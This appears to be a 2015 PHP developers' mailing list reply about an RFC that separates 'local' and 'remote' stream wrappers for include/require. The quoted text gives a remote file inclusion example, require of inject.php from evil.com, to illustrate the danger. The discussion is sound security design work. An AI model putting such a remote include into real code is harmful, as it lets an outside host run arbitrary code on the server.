Hi Stas, On Fri, Feb 27, 2015 at 7:52 AM, Stanislav Malyshev <smalys...@gmail.com> wrote:
> including require > "http://evil.com/inject.php";. That's not a good choice to give to the > users. > For this concern, we have 2 classes of wrappers "local" and "remote". php://input and php://stdin would be issue, since it contains "remote" input under Web SAPI while it is "local" with CLI. We may handle php://input and php://stdin separately. What do you think? BTW, I'm not going to change allow_url_fopen. The RFC does not affects at all for readfile/fopen/etc. Regards, -- Yasuo Ohgaki yohg...@ohgaki.net
